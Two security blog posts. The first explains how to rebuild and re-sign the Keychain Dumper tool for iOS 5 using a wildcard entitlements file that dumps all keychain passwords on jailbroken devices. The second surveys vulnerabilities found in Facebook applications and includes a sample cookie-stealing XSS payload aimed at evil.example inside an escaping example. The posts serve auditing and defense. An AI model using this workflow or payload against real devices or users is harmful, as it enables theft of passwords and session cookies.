Keychain Dumper Updated for iOS 5

By Patrick Toomey

Direct link to Keychain Dumper (for those who want to skip the article and get straight to the code)

Last year I pushed a copy of Keychain Dumper to GitHub to help audit the sensitive information an application stores on an iOS device using Apple’s Keychain service.  I’ve received a few issue submissions on GitHub from people having trouble getting Keychain Dumper to work on iOS 5. I meant to look into it earlier, but I was not able to dedicate any time until this week. Aside from a small update to the Makefile for compatibility with the latest SDK, the core issue seemed to be related to code signing.

Using the directions I published last year the high level steps to dump keychain passwords were:

  1. Compile
  2. Push keychain_dumper to iOS device
  3. Use keychain_dumper to export all the required entitlements
  4. Use ldid to sign these entitlements into keychain_dumper
  5. Rerun keychain_dumper to dump all accessible keychain items
Steps 1-3 continue to work fine on iOS 5.  It is step 4 that breaks, and it happens to be the one step I took completely for granted, as I had never looked into how ldid works.  Originally, signing the entitlements into keychain_dumper was as simple as:
./keychain_dumper -e > /var/tmp/entitlements.xml
ldid -S/var/tmp/entitlements.xml keychain_dumper

However, on iOS 5 you get the following error when running ldid:

codesign_allocate: object: keychain_dumper1 malformed object
(unknown load command 8)
util/ldid.cpp(582): _assert(78:WEXITSTATUS(status) == 0)

Looking around for the code to ldid, I found that it doesn’t actually do much of the heavy lifting with regard to code signing; it simply execs out to another command, codesign_allocate (the allocate variable below):

execlp(allocate, allocate, "-i", path, "-a", arch, ssize, "-o", temp, NULL);

The Cydia build of codesign_allocate looks to be based on the odcctools project that was once open source from Apple.  It’s unclear to me, but it appears this codebase was eventually taken closed source by Apple, as the code does not appear to have been updated recently.  Digging into the code for codesign_allocate, the error above:

unknown load command 8

makes much more sense, as codesign_allocate parses each of the Mach-O headers, including each of the load commands that are part of the Mach-O file structure.  It appears that load command 8 must have been added sometime between when I first released Keychain Dumper and now, as the version of codesign_allocate that comes with Cydia does not support parsing this load command.  This load command is responsible for recording the minimum required version of iOS for the application.  If someone knows a compile-time flag that prevents this (and possibly other) unsupported load command(s) from being emitted, let me know and I’ll update the Makefile.  The other options for getting the tool working again were to either update odcctools to handle the new Mach-O structure or figure out an alternative way of signing applications.
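To illustrate the kind of parsing that trips up an outdated tool, here is a minimal Python sketch (not the actual codesign_allocate source) that walks the load commands of a 32-bit Mach-O image and fails on any command it doesn’t recognize. The KNOWN_COMMANDS set is a small illustrative subset, and LC_VERSION_MIN_IPHONEOS (0x25 in later Mach-O headers) stands in for the minimum-version load command described above:

```python
import struct

MH_MAGIC = 0xFEEDFACE           # 32-bit Mach-O magic number
LC_VERSION_MIN_IPHONEOS = 0x25  # load command carrying the minimum iOS version

# Load commands an older tool "knows about" (illustrative subset):
# SEGMENT, SYMTAB, UNIXTHREAD, DYSYMTAB, LOAD_DYLINKER
KNOWN_COMMANDS = {0x1, 0x2, 0x5, 0xB, 0xE}

def list_load_commands(data):
    """Walk the load commands of a 32-bit Mach-O image, failing on
    unrecognized commands the way an outdated codesign_allocate would."""
    magic, cputype, cpusubtype, filetype, ncmds, sizeofcmds, flags = \
        struct.unpack_from("<7I", data, 0)
    assert magic == MH_MAGIC, "not a 32-bit Mach-O file"
    offset, cmds = 28, []  # the mach_header is 7 * 4 bytes
    for _ in range(ncmds):
        cmd, cmdsize = struct.unpack_from("<2I", data, offset)
        if cmd not in KNOWN_COMMANDS and cmd != LC_VERSION_MIN_IPHONEOS:
            raise ValueError("unknown load command %d" % cmd)
        cmds.append(cmd)
        offset += cmdsize
    return cmds

# Build a minimal fake image purely for demonstration: a header plus one
# LC_VERSION_MIN_IPHONEOS command (cmd, cmdsize, version, sdk = 16 bytes).
header = struct.pack("<7I", MH_MAGIC, 12, 9, 2, 1, 16, 0)
min_ios = struct.pack("<4I", LC_VERSION_MIN_IPHONEOS, 16, 5 << 16, 5 << 16)
print(list_load_commands(header + min_ios))  # → [37]
```

A tool built before a given load command existed has no entry for it in its parser, so the only safe thing it can do is bail out with exactly the kind of “unknown load command” error shown above.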

Historically there have been three ways to create pseudo-signatures for Cydia-based applications (you can see them here).  The third uses sysctl, and is no longer valid, as Apple made changes that render the relevant configuration entries read-only.  The second option uses ldid, and was the approach I used originally.  The first uses the tools that come with OS X: create a self-signed certificate and use the command-line development tools to sign your jailbroken iOS application with it.  It appears the tools provided by Apple are essentially updated versions of the odcctools project referenced earlier.  The same codesign_allocate tool exists, and looks to be more up to date, with support for parsing all the relevant load commands.  I decided to leverage the integrated tools, as that seems the best way to ensure compatibility going forward.  Using Apple’s tools I was able to sign the necessary entitlements into keychain_dumper and dump all the relevant Keychain items as before.  The steps for getting this to work are as follows:

  1. Open up the Keychain Access app located in /Applications/Utilities/Keychain Access
  2. From the application menu open Keychain Access -> Certificate Assistant -> Create a Certificate
  3. Enter a name for the certificate, and make note of it, as you will need it later when you sign Keychain Dumper.  Make sure the Identity Type is “Self Signed Root” and the Certificate Type is “Code Signing”.  You don’t need to check “Let me override defaults” unless you want to change other properties of the certificate (name, email, etc.).
  4. Compile Keychain Dumper as instructed in the original blog post (condensed below):
ln -s /Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS5.0.sdk/ sdk
ln -s /Developer/Platforms/iPhoneOS.platform/Developer toolchain
  5. scp the resulting keychain_dumper to your phone (any file system reference made here will be in /tmp)
  6. Dump the entitlements from the phone
./keychain_dumper -e > /var/tmp/entitlements.xml
  7. Copy the entitlements.xml file back to your development machine (or just cat the contents and copy/paste)
  8. Sign the application with the entitlements and the certificate generated earlier (you must select “Allow” when prompted to let the code signing tool access the private key of the certificate we generated)
codesign -fs "Test Cert 1" --entitlements entitlements.xml keychain_dumper
  9. scp the resulting keychain_dumper to your phone (you can remove the original copy we uploaded in step 5)
  10. You should now be able to dump Keychain items as before
  11. If all of the above worked, you will see numerous entries similar to the following:
Service: Vendor1_Here
Account: remote
Entitlement Group: R96HGCUQ8V.*
Label: Generic
Field: data
Keychain Data: SenSiTive_PassWorD_Here

Now, the above directions work fine, but after dumping the passwords something caught my eye.  Notice the asterisk in the above entitlement group.  The Keychain system restricts access to individual entries according to the “Entitlement Group”, which is why we first dumped all of the entitlement groups used by applications on the phone and then signed those entitlements into the keychain_dumper binary.  I thought that maybe the asterisk in the above entitlement group had some sort of wildcarding properties.  So, as a proof of concept, I created a new entitlements.xml file that contains a single entitlement:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>keychain-access-groups</key>
    <array>
        <string>*</string>
    </array>
</dict>
</plist>

The above file lists a single entitlement defined by “*”, which, if the assumption holds, might wildcard all Entitlement Groups.  Using the above file, I recompiled Keychain Dumper and re-signed the application with the wildcard entitlements.xml file.  Surprise…it works, and it simplifies the workflow.  I have added this entitlements.xml file to the Git repository.  Instead of first needing to upload keychain_dumper to the phone, dump entitlements, and then sign the app, you can simply sign the application using this entitlements.xml file.  Moreover, the binary checked in to Git is already signed using the wildcard entitlement and should work on any jailbroken iOS device running iOS 5, as there is no need to customize the binary for each user’s device/entitlements.
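As an aside, a wildcard entitlements file like this can also be generated programmatically with the standard-library plistlib, which avoids hand-editing XML. This sketch assumes the entitlement key in question is keychain-access-groups, the key that governs Keychain access group membership:

```python
import plistlib

# Build the wildcard entitlements dictionary: a single entitlement,
# keychain-access-groups, whose only member is the "*" wildcard.
entitlements = {"keychain-access-groups": ["*"]}

# plistlib serializes it as the same XML property list format shown above.
print(plistlib.dumps(entitlements).decode())
```

Either way, the resulting file is what gets passed to codesign via the --entitlements flag.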

The consolidated directions can be found on the GitHub repository page, found here.   A direct link to the binary, which should hopefully work on any jailbroken iOS 5 device, can be found here.

Facebook Applications Have Nagging Vulnerabilities

By Neohapsis Researchers Andy Hoernecke and Scott Behrens

This is the second post in our Social Networking series. (Read the first one here.)

As Facebook’s application platform has become more popular, the composition of applications has evolved. While early applications seemed to focus on either social gaming or extending the capabilities of Facebook, now Facebook is being utilized as a platform by major companies to foster interaction with their customers in a variety of forms, such as sweepstakes, promotions, shopping, and more.

And why not?  We’ve all heard the numbers: Facebook has 800 million active users, 50% of whom log on every day. On average, more than 20 million Facebook applications are installed by users every day, while more than 7 million applications and websites are integrated with Facebook. (1)  Additionally, Facebook is seen as a treasure trove of valuable data accessible to anyone who can get enough “Likes” on their page or application.

As corporate investments in social applications have grown, Neohapsis Labs researchers have been asked to help clients assess these applications and determine what type of risk exposure their release may pose. We took a sample of the applications we have assessed and pulled together some interesting trends. For context, most of these applications are very small (2-4 dynamic pages).  The functionality contained in these applications ranged from simple sweepstakes entry forms and contests with content submission (photos, essays, videos, etc.) to gaming and shopping applications.

From our sample, we found that the applications assessed had, on average, vulnerabilities in 2.5 vulnerability classes (e.g., Cross-Site Scripting or SQL Injection), and none of the applications were completely free of vulnerabilities. Given how small the attack surface of these applications is, this is a somewhat surprising statistic.

The most commonly identified findings in our sample group of applications included Cross-Site Scripting, Insufficient Transport Layer Protection, and Insecure File Upload vulnerabilities. Each of these vulnerability classes is discussed below, along with how the social networking aspect of the applications affects their potential impact.

Facebook applications suffer the most from Cross-Site Scripting. This type of vulnerability was identified in 46% of the applications sampled.  This is not surprising, since this age-old problem still creeps into many corporate and personal applications today.  An application vulnerable to XSS could be used to attempt browser-based exploits or to steal session cookies (but only in the context of the application’s domain).

These types of applications are generally framed inline [inline framing, or iframing, is a common HTML technique for framing media content] on a Facebook page from the developer’s own servers/domain. This alleviates some of the risk to the user’s Facebook account, since the JavaScript can’t access Facebook’s session cookies.  And even if it could, Facebook uses HttpOnly flags to prevent JavaScript from accessing session cookie values.  But we have found that companies tend to reuse the same domain name for these applications, since the real URL is generally never visible to the end user. This means that if one application has an XSS vulnerability, it could present a risk to any other application hosted at the same domain.
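The core defense against this class of bug is output encoding: any user-supplied value must be escaped before it is embedded in an HTML response. A minimal sketch (the render_comment function and payload are hypothetical, not from any application we assessed):

```python
import html

def render_comment(user_input):
    """Escape user-supplied text before embedding it in HTML, the basic
    defense against reflected and stored XSS."""
    return "<div class='comment'>%s</div>" % html.escape(user_input)

# A classic cookie-stealing payload is neutralized into inert text.
payload = "<script>document.location='http://evil.example/?c='+document.cookie</script>"
print(render_comment(payload))
```

html.escape converts the angle brackets, ampersands, and quotes into HTML entities, so the browser renders the payload as text instead of executing it.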

When third-party developers enter the picture, all this becomes even more of a concern, since two clients’ applications may share the same domain and thus each be reliant, in some ways, on the security of the other’s application.

The second most commonly identified vulnerability, affecting 37% of the sample, was Insufficient Transport Layer Protection. While it is a common myth that conducting a man-in-the-middle attack against cleartext protocols is prohibitively difficult, the truth is that it’s relatively simple.  Tools such as Firesheep aid in this process, allowing an attacker to create custom JavaScript handlers to capture and replay the right session cookies.  About an hour after downloading Firesheep and looking at examples, we wrote a custom handler for an application under assessment that only used SSL when submitting login information.   On an unprotected Wi-Fi network, as soon as the application sent any information over HTTP we had valid session cookies, which were easily replayed to compromise the victim’s session.
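The simplest mitigation, beyond serving the entire application over SSL, is to mark the session cookie so the browser will never send it over cleartext HTTP in the first place. A minimal sketch using Python’s standard-library http.cookies (the cookie name and token are illustrative):

```python
from http.cookies import SimpleCookie

def session_cookie_header(token):
    """Build a Set-Cookie header value for a session token: 'secure'
    restricts the cookie to HTTPS so it never leaks over cleartext HTTP,
    and 'httponly' hides it from JavaScript."""
    cookie = SimpleCookie()
    cookie["session"] = token
    cookie["session"]["secure"] = True
    cookie["session"]["httponly"] = True
    return cookie["session"].OutputString()

print(session_cookie_header("abc123"))
```

With the Secure flag set, a Firesheep-style passive listener on an open Wi-Fi network never sees the session cookie, because the browser withholds it from all HTTP requests.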

Once again, the impact of this finding really depends on the functionality of the application, but the wide variety of applications on Facebook does provide an interesting and varied landscape for the attacker to choose from.  We only flagged this vulnerability under specific circumstances where either the application cookies were somehow important (for example, being used to identify a logged-in session) or the application included functionality where sensitive data (such as PII or credit card data) was transmitted.

The third most commonly identified finding was Insecure File Upload. To us, this was surprising, since it’s generally not considered one of the most common vulnerabilities across web applications as a whole. Nevertheless, 27% of our sample included this type of vulnerability. We attribute its identification rate to the prevalence of social applications that include some type of file upload functionality (to share an avatar, photo, document, movie, etc.).

We found that many of the applications we assessed implemented their file upload functionality insecurely.  Most of the applications did not check content-type headers or even file extensions.  Although none of the vulnerabilities discovered led to command injection, almost every vulnerability exploited allowed the attacker to upload JavaScript, HTML, or other potentially malicious files such as PDFs and executables.  Depending on the domain name affected by this vulnerability, this flaw would aid the attacker’s social engineering efforts, as the attacker now has malicious files on a trusted domain.
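A safer upload handler allowlists what it accepts and verifies that the extension, the declared content type, and the file’s actual magic bytes all agree. A minimal sketch for image uploads (the function name and allowlists are illustrative, not from any assessed application):

```python
import os

# Illustrative allowlists; a real deployment would tailor these to its needs.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}
ALLOWED_CONTENT_TYPES = {"image/jpeg", "image/png", "image/gif"}

def is_upload_allowed(filename, content_type, header_bytes):
    """Allowlist-based upload check: the extension, the declared content
    type, and the file's leading magic bytes must all agree it's an image."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXTENSIONS or content_type not in ALLOWED_CONTENT_TYPES:
        return False
    # Check magic bytes rather than trusting client-supplied metadata:
    # JPEG, PNG, and the two GIF signatures.
    signatures = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a")
    return header_bytes.startswith(signatures)

print(is_upload_allowed("avatar.png", "image/png", b"\x89PNG\r\n\x1a\n...."))  # → True
print(is_upload_allowed("evil.html", "text/html", b"<script>"))                # → False
```

Checking magic bytes matters because both the filename and the Content-Type header are supplied by the client and are trivially forged.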

Our assessments also identified a wide range of other vulnerability types. For example, we found several of these applications utilizing publicly available admin interfaces with guessable credentials. Furthermore, at least one of the admin interfaces was riddled with stored XSS vulnerabilities. Server configuration was also a frequent problem, with unnecessarily exposed services and insecure configurations repeatedly identified.

Finally, we also found that many of these web applications had some interesting issues that are generally unlikely to affect a standard web application. For example, social applications with a contest component may need to worry about the integrity of the contest. If it is possible for a malicious user to game the contest (for example by cheating at a social game and placing a fake high score) this could reflect badly on the application, the contest, and the sponsoring brand.

Even though development of applications integrated with Facebook and other social networking sites is increasing, we’ve found companies still tend to handle these outside of their normal security processes. It is important to realize that these applications can present real risk and should be examined just as thoroughly as traditional standalone web applications.